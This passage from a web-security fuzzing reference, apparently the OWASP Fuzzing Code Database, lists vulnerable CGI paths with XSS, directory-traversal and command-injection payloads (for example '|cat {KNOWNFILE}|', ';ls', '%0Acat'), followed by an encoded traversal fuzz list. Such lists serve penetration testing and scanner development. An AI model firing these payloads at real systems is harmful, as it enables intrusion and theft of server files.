cvsqueryform.cgi?cvsroot=/cvsroot&amp;amp;module=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;branch=HEAD&lt;br /&gt;
dansguardian.pl?DENIEDURL=&amp;lt;/a&amp;gt;&amp;lt;script&amp;gt;alert('XSS');&amp;lt;/script&amp;gt;&lt;br /&gt;
dasp/fm_shell.asp&lt;br /&gt;
data/fetch.php?page=&lt;br /&gt;
date&lt;br /&gt;
day5datacopier.cgi&lt;br /&gt;
day5datanotifier.cgi&lt;br /&gt;
db2www/library/document.d2w/show&lt;br /&gt;
db4web_c/dbdirname/{KNOWNFILE}&lt;br /&gt;
db_manager.cgi&lt;br /&gt;
dbman/db.cgi?db=no-db&lt;br /&gt;
dcforum.cgi?az=list&amp;amp;forum=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
dcshop/auth_data/auth_user_file.txt&lt;br /&gt;
dcshop/orders/orders.txt&lt;br /&gt;
dfire.cgi&lt;br /&gt;
diagnose.cgi&lt;br /&gt;
dig.cgi&lt;br /&gt;
directorypro.cgi?want=showcat&amp;amp;show=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
displayTC.pl&lt;br /&gt;
dnewsweb&lt;br /&gt;
donothing&lt;br /&gt;
dose.pl?daily&amp;amp;somefile.txt&amp;amp;|ls|&lt;br /&gt;
download.cgi&lt;br /&gt;
dumpenv.pl&lt;br /&gt;
edit.pl&lt;br /&gt;
empower?DB=whateverwhatever&lt;br /&gt;
emu/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
emumail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
enter.cgi&lt;br /&gt;
environ.cgi&lt;br /&gt;
environ.pl&lt;br /&gt;
environ.pl?param1=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
erba/start/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
eshop.pl/seite=;cat%20eshop.pl|&lt;br /&gt;
ex-logger.pl&lt;br /&gt;
excite&lt;br /&gt;
excite;IF&lt;br /&gt;
ezadmin.cgi&lt;br /&gt;
ezboard.cgi&lt;br /&gt;
ezman.cgi&lt;br /&gt;
ezshopper/loadpage.cgi?user_id=1&amp;amp;file=|cat%20{KNOWNFILE}|&lt;br /&gt;
ezshopper/search.cgi?user_id=id&amp;amp;database=dbase1.exm&amp;amp;template=../../../../../../..{KNOWNFILE}&amp;amp;distinct=1&lt;br /&gt;
ezshopper2/loadpage.cgi&lt;br /&gt;
ezshopper3/loadpage.cgi&lt;br /&gt;
faqmanager.cgi?toc={KNOWNFILE}%00&lt;br /&gt;
faxsurvey?cat%20{KNOWNFILE}&lt;br /&gt;
filemail&lt;br /&gt;
filemail.pl&lt;br /&gt;
finger&lt;br /&gt;
finger.pl&lt;br /&gt;
flexform&lt;br /&gt;
flexform.cgi&lt;br /&gt;
fom.cgi?file=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
fom/fom.cgi?cmd=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&amp;amp;file=1&amp;amp;keywords=vulnerable&lt;br /&gt;
formmail&lt;br /&gt;
formmail.cgi&lt;br /&gt;
formmail.cgi?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail.pl&lt;br /&gt;
formmail.pl?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
formmail?recipient=root@localhost%0Acat%20{KNOWNFILE}&amp;amp;email=joeuser@localhost&amp;amp;subject=test&lt;br /&gt;
fortune&lt;br /&gt;
ftp.pl&lt;br /&gt;
ftpsh&lt;br /&gt;
gH.cgi&lt;br /&gt;
gbadmin.cgi?action=change_adminpass&lt;br /&gt;
gbadmin.cgi?action=change_automail&lt;br /&gt;
gbadmin.cgi?action=colors&lt;br /&gt;
gbadmin.cgi?action=setup&lt;br /&gt;
gbook/gbook.cgi?_MAILTO=xx;ls&lt;br /&gt;
gbpass.pl&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1&lt;br /&gt;
generate.cgi?content=../../../../../../../../../..{KNOWNFILE}%00board=board_1&lt;br /&gt;
getdoc.cgi&lt;br /&gt;
gettransbitmap&lt;br /&gt;
glimpse&lt;br /&gt;
gm-authors.cgi&lt;br /&gt;
gm-cplog.cgi&lt;br /&gt;
gm.cgi&lt;br /&gt;
guestbook.cgi&lt;br /&gt;
guestbook.cgi?user=cpanel&amp;amp;template=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
guestbook.pl&lt;br /&gt;
guestbook/passwd&lt;br /&gt;
handler.cgi&lt;br /&gt;
hitview.cgi&lt;br /&gt;
horde/test.php&lt;br /&gt;
horde/test.php?mode=phpinfo&lt;br /&gt;
hsx.cgi?show=../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
htgrep?file=index.html&amp;amp;hdr={KNOWNFILE}&lt;br /&gt;
html2chtml.cgi&lt;br /&gt;
html2wml.cgi&lt;br /&gt;
htmlscript?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
htsearch.cgi?words=%22%3E%3Cscript%3Ealert%'XSS'%29%3B%3C%2Fscript%3E&lt;br /&gt;
htsearch?-c/nonexistant&lt;br /&gt;
htsearch?config=foofighter&amp;amp;restrict=&amp;amp;exclude=&amp;amp;method=and&amp;amp;format=builtin-long&amp;amp;sort=score&amp;amp;words=&lt;br /&gt;
htsearch?exclude=%60{KNOWNFILE}%60&lt;br /&gt;
ibill.pm&lt;br /&gt;
icat&lt;br /&gt;
if/admin/nph-build.cgi&lt;br /&gt;
ikonboard/help.cgi?&lt;br /&gt;
imageFolio.cgi&lt;br /&gt;
imagefolio/admin/admin.cgi&lt;br /&gt;
imagemap&lt;br /&gt;
include/new-visitor.inc.php&lt;br /&gt;
index.js0x70&lt;br /&gt;
index.pl&lt;br /&gt;
info2www&lt;br /&gt;
info2www '(../../../../../../../bin/mail root &amp;lt;{KNOWNFILE}&amp;gt;&lt;br /&gt;
infosrch.cgi&lt;br /&gt;
ion-p?page=../../../../..{KNOWNFILE}&lt;br /&gt;
jailshell&lt;br /&gt;
jj&lt;br /&gt;
journal.cgi?folder=journal.cgi%00&lt;br /&gt;
ksh&lt;br /&gt;
lastlines.cgi?process&lt;br /&gt;
listrec.pl&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
loadpage.cgi?user_id=1&amp;amp;file=..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
log-reader.cgi&lt;br /&gt;
log/&lt;br /&gt;
log/nether-log.pl?checkit&lt;br /&gt;
login.cgi&lt;br /&gt;
login.pl&lt;br /&gt;
login.pl?course_id=\&lt;br /&gt;
logit.cgi&lt;br /&gt;
logs.pl&lt;br /&gt;
logs/&lt;br /&gt;
logs/access_log&lt;br /&gt;
logs/error_log&lt;br /&gt;
lookwho.cgi&lt;br /&gt;
ls&lt;br /&gt;
lwgate&lt;br /&gt;
lwgate.cgi&lt;br /&gt;
magiccard.cgi?pa=3Dpreview&amp;amp;amp;next=3Dcustom&amp;amp;amp;page=3D../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mail&lt;br /&gt;
mail/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mail/nph-mr.cgi?do=loginhelp&amp;amp;configLanguage=../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
mailit.pl&lt;br /&gt;
maillist.cgi&lt;br /&gt;
maillist.pl&lt;br /&gt;
mailnews.cgi&lt;br /&gt;
main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
majordomo.pl&lt;br /&gt;
man2html&lt;br /&gt;
mastergate/search.cgi?search=0&amp;amp;search_on=all&lt;br /&gt;
meta.pl&lt;br /&gt;
mgrqcgi&lt;br /&gt;
mini_logger.cgi&lt;br /&gt;
mmstdod.cgi&lt;br /&gt;
moin.cgi?test&lt;br /&gt;
mojo/mojo.cgi&lt;br /&gt;
mrtg.cfg?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
mrtg.cgi?cfg=blah&lt;br /&gt;
ms_proxy_auth_query/&lt;br /&gt;
mt-static/&lt;br /&gt;
mt-static/mt-check.cgi&lt;br /&gt;
mt-static/mt-load.cgi&lt;br /&gt;
mt-static/mt.cfg&lt;br /&gt;
mt/&lt;br /&gt;
mt/mt-check.cgi&lt;br /&gt;
mt/mt-load.cgi&lt;br /&gt;
mt/mt.cfg&lt;br /&gt;
multihtml.pl?multi={KNOWNFILE}%00html&lt;br /&gt;
musicqueue.cgi&lt;br /&gt;
myguestbook.cgi?action=view&lt;br /&gt;
namazu.cgi&lt;br /&gt;
nbmember.cgi?cmd=list_all_users&lt;br /&gt;
netauth.cgi?cmd=show&amp;amp;page=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
netpad.cgi&lt;br /&gt;
newsdesk.cgi?t=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
nimages.php&lt;br /&gt;
nlog-smb.cgi&lt;br /&gt;
nlog-smb.pl&lt;br /&gt;
non-existent.pl&lt;br /&gt;
noshell&lt;br /&gt;
nph-emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
nph-error.pl&lt;br /&gt;
nph-exploitscanget.cgi&lt;br /&gt;
nph-maillist.pl&lt;br /&gt;
nph-publish&lt;br /&gt;
nph-publish.cgi&lt;br /&gt;
nph-showlogs.pl?files=../../&amp;amp;filter=.*&amp;amp;submit=Go&amp;amp;linecnt=500&amp;amp;refresh=0&lt;br /&gt;
nph-test-cgi&lt;br /&gt;
ntitar.pl&lt;br /&gt;
opendir.php?{KNOWNFILE}&lt;br /&gt;
orders/orders.txt&lt;br /&gt;
pagelog.cgi&lt;br /&gt;
pals-cgi?palsAction=restart&amp;amp;documentName={KNOWNFILE}&lt;br /&gt;
parse-file&lt;br /&gt;
pass&lt;br /&gt;
passwd&lt;br /&gt;
passwd.txt&lt;br /&gt;
password&lt;br /&gt;
pbcgi.cgi?name=Joe%Camel&amp;amp;email=%3C&lt;br /&gt;
perl&lt;br /&gt;
perl?-v&lt;br /&gt;
perlshop.cgi&lt;br /&gt;
pfdispaly.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
pfdispaly.cgi?../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
pfdisplay.cgi?'%0A/bin/cat%20{KNOWNFILE}|'&lt;br /&gt;
phf&lt;br /&gt;
phf.cgi?QALIA&lt;br /&gt;
phf?Qname=root%0Acat%20{KNOWNFILE}%20&lt;br /&gt;
photo/&lt;br /&gt;
photo/manage.cgi&lt;br /&gt;
photo/protected/manage.cgi&lt;br /&gt;
php-cgi&lt;br /&gt;
php.cgi?{KNOWNFILE}&lt;br /&gt;
plusmail&lt;br /&gt;
pollit/Poll_It_&lt;br /&gt;
pollssi.cgi&lt;br /&gt;
post-query&lt;br /&gt;
post_query&lt;br /&gt;
postcards.cgi&lt;br /&gt;
powerup/r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
printenv&lt;br /&gt;
printenv.tmp&lt;br /&gt;
probecontrol.cgi?command=enable&amp;amp;username=cancer&amp;amp;password=killer&lt;br /&gt;
processit.pl&lt;br /&gt;
profile.cgi&lt;br /&gt;
pu3.pl&lt;br /&gt;
publisher/search.cgi?dir=jobs&amp;amp;template=;cat%20{KNOWNFILE}|&amp;amp;output_number=10&lt;br /&gt;
query&lt;br /&gt;
query?mss=%2e%2e/config&lt;br /&gt;
quickstore.cgi?page=../../../../../../../../../..{KNOWNFILE}%00html&amp;amp;cart_id=&lt;br /&gt;
quikstore.cfg&lt;br /&gt;
quizme.cgi&lt;br /&gt;
r.cgi?FILE=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ratlog.cgi&lt;br /&gt;
redirect&lt;br /&gt;
register.cgi&lt;br /&gt;
replicator/webpage.cgi/&lt;br /&gt;
responder.cgi&lt;br /&gt;
retrieve_password.pl&lt;br /&gt;
rksh&lt;br /&gt;
rmp_query&lt;br /&gt;
robadmin.cgi&lt;br /&gt;
robpoll.cgi&lt;br /&gt;
rpm_query&lt;br /&gt;
rsh&lt;br /&gt;
rtm.log&lt;br /&gt;
rwcgi60&lt;br /&gt;
rwcgi60/showenv&lt;br /&gt;
rwwwshell.pl&lt;br /&gt;
sawmill5?rfcf+%22{KNOWNFILE}%22+spbn+1,1,21,1,1,1,1&lt;br /&gt;
sawmill?rfcf+%22&lt;br /&gt;
sbcgi/sitebuilder.cgi&lt;br /&gt;
scoadminreg.cgi&lt;br /&gt;
scripts/*%0a.pl&lt;br /&gt;
search.cgi&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\windows\\win.ini&lt;br /&gt;
search.cgi?..\\..\\..\\..\\..\\..\\..\\..\\..\\winnt\\win.ini&lt;br /&gt;
search.php?searchstring=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl&lt;br /&gt;
search.pl?Realm=All&amp;amp;Match=0&amp;amp;Terms=test&amp;amp;nocpp=1&amp;amp;maxhits=10&amp;amp;;Rank=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
search.pl?form=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
search/search.cgi?keys=*&amp;amp;prc=any&amp;amp;catigory=../../../../../../../../../../../../etc&lt;br /&gt;
sendform.cgi&lt;br /&gt;
sendpage.pl?message=test\;/bin/ls%20/etc;echo%20\message&lt;br /&gt;
sendtemp.pl?templ=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
session/adminlogin&lt;br /&gt;
sewse?/home/httpd/html/sewse/jabber/comment2.jse+{KNOWNFILE}&lt;br /&gt;
sh&lt;br /&gt;
shop.cgi?page=../../../../../../..{KNOWNFILE}&lt;br /&gt;
shop.pl/page=;cat%20shop.pl|&lt;br /&gt;
shop/auth_data/auth_user_file.txt&lt;br /&gt;
shop/orders/orders.txt&lt;br /&gt;
shopper.cgi?newpage=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
shopplus.cgi?dn=domainname.com&amp;amp;cartid=%CARTID%&amp;amp;file=;cat%20{KNOWNFILE}|&lt;br /&gt;
show.pl&lt;br /&gt;
showcheckins.cgi?person=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
showuser.cgi&lt;br /&gt;
simple/view_page?mv_arg=|cat%20{KNOWNFILE}|&lt;br /&gt;
simplestguest.cgi&lt;br /&gt;
simplestmail.cgi&lt;br /&gt;
smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
smartsearch/smartsearch.cgi?keywords=|/bin/cat%20{KNOWNFILE}|&lt;br /&gt;
sojourn.cgi?cat=../../../../../../../../../../etc/password%00&lt;br /&gt;
spin_client.cgi?aaaaaaaa&lt;br /&gt;
ss&lt;br /&gt;
sscd_suncourier.pl&lt;br /&gt;
ssi//%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e{KNOWNFILE}&lt;br /&gt;
start.cgi/%3Cscript%3Ealert('XSS');%3C/script%3E&lt;br /&gt;
stat.pl&lt;br /&gt;
stat/&lt;br /&gt;
stats-bin-p/reports/index.html&lt;br /&gt;
stats.pl&lt;br /&gt;
stats.prf&lt;br /&gt;
stats/&lt;br /&gt;
stats/statsbrowse.asp?filepath=c:\&amp;amp;Opt=3&lt;br /&gt;
stats_old/&lt;br /&gt;
statsconfig&lt;br /&gt;
statusconfig.pl&lt;br /&gt;
statview.pl&lt;br /&gt;
store.cgi?&lt;br /&gt;
store/agora.cgi?cart_id=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
store/agora.cgi?page=whatever33.html&lt;br /&gt;
store/index.cgi?page=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
story/story.pl?next=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
survey&lt;br /&gt;
survey.cgi&lt;br /&gt;
sws/admin.html&lt;br /&gt;
sws/manager.pl&lt;br /&gt;
tablebuild.pl&lt;br /&gt;
talkback.cgi?article=../../../../../../../..{KNOWNFILE}%00&amp;amp;action=view&amp;amp;matchview=1&lt;br /&gt;
tcsh&lt;br /&gt;
technote/main.cgi?board=FREE_BOARD&amp;amp;command=down_load&amp;amp;filename=/../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
test-cgi.tcl&lt;br /&gt;
test-cgi?/*&lt;br /&gt;
test-env&lt;br /&gt;
test.cgi&lt;br /&gt;
test/test.cgi&lt;br /&gt;
texis/junk&lt;br /&gt;
texis/phine&lt;br /&gt;
textcounter.pl&lt;br /&gt;
tidfinder.cgi&lt;br /&gt;
tigvote.cgi&lt;br /&gt;
title.cgi&lt;br /&gt;
tpgnrock&lt;br /&gt;
traffic.cgi?cfg=../../../../../../../..{KNOWNFILE}&lt;br /&gt;
troops.cgi&lt;br /&gt;
ttawebtop.cgi/?action=start&amp;amp;pg=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
ultraboard.cgi&lt;br /&gt;
ultraboard.pl&lt;br /&gt;
unlg1.1&lt;br /&gt;
unlg1.2&lt;br /&gt;
update.dpgs&lt;br /&gt;
upload.cgi&lt;br /&gt;
uptime&lt;br /&gt;
urlcount.cgi?%3CIMG%20&lt;br /&gt;
ustorekeeper.pl?command=goto&amp;amp;file=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
utm/admin&lt;br /&gt;
utm/utm_stat&lt;br /&gt;
view-source&lt;br /&gt;
view-source?view-source&lt;br /&gt;
view_item?HTML_FILE=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
viewcvs.cgi/viewcvs/?cvsroot=&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
viewcvs.cgi/viewcvs/viewcvs/?sortby=rev\&lt;br /&gt;
viewlogs.pl&lt;br /&gt;
viewsource?{KNOWNFILE}&lt;br /&gt;
viralator.cgi&lt;br /&gt;
virgil.cgi&lt;br /&gt;
vote.cgi&lt;br /&gt;
vpasswd.cgi&lt;br /&gt;
vq/demos/respond.pl?&amp;lt;script&amp;gt;alert('XSS')&amp;lt;/script&amp;gt;&lt;br /&gt;
w3-msql&lt;br /&gt;
w3-sql&lt;br /&gt;
wais.pl&lt;br /&gt;
way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
way-board/way-board.cgi?db={KNOWNFILE}%00&lt;br /&gt;
webais&lt;br /&gt;
webbbs.cgi&lt;br /&gt;
webbbs/webbbs_config.pl?name=joe&amp;amp;email=test@example.com&amp;amp;body=aaaaffff&amp;amp;followup=10;cat%20{KNOWNFILE}&lt;br /&gt;
webcart/webcart.cgi?CONFIG=mountain&amp;amp;CHANGE=YE&lt;br /&gt;
webdist.cgi?distloc=;cat%20{KNOWNFILE}&lt;br /&gt;
webdriver&lt;br /&gt;
webgais&lt;br /&gt;
webif.cgi&lt;br /&gt;
webmail/html/emumail.cgi?type=/../../../../../../../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
webmap.cgi&lt;br /&gt;
webnews.pl&lt;br /&gt;
webplus?about&lt;br /&gt;
webplus?script=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
websendmail&lt;br /&gt;
webspirs.cgi?sp.nextform=../../../../../../../../../..{KNOWNFILE}&lt;br /&gt;
webutil.pl&lt;br /&gt;
webutils.pl&lt;br /&gt;
webwho.pl&lt;br /&gt;
where.pl?sd=ls%20/etc&lt;br /&gt;
whois.cgi?action=load&amp;amp;whois=%3Bid&lt;br /&gt;
whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois/whois.cgi?lookup=;&amp;amp;ext=/bin/cat%20{KNOWNFILE}&lt;br /&gt;
whois_raw.cgi?fqdn=%0Acat%20{KNOWNFILE}&lt;br /&gt;
windmail&lt;br /&gt;
wrap&lt;br /&gt;
wrap.cgi&lt;br /&gt;
ws_ftp.ini&lt;br /&gt;
www-sql&lt;br /&gt;
wwwadmin.pl&lt;br /&gt;
wwwboard.cgi.cgi&lt;br /&gt;
wwwboard.pl&lt;br /&gt;
wwwstats.pl&lt;br /&gt;
wwwthreads/3tvars.pm&lt;br /&gt;
wwwthreads/w3tvars.pm&lt;br /&gt;
wwwwais&lt;br /&gt;
zml.cgi?file=../../../../../../../../../..{KNOWNFILE}%00&lt;br /&gt;
zsh&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Generic 8 Directory Deep Traversal Fuzz (17 March 2010 - Total Statements: 879) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Generic 8 Directory Deep Traversal Fuzz (17 March 2010) &lt;br /&gt;
# Derived from the awesome &amp;quot;Directory Traversal Fuzzing Code&amp;quot; v0.2 by Luca Carettoni&lt;br /&gt;
# Did some cleanup &amp;amp; removed anything to the right of {FILE} for inclusion in a&lt;br /&gt;
# separate fuzzfile for more flexibiity, for the OWASP Fuzzing Code Database. &lt;br /&gt;
# adam.muntner@uietmove.com &lt;br /&gt;
&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
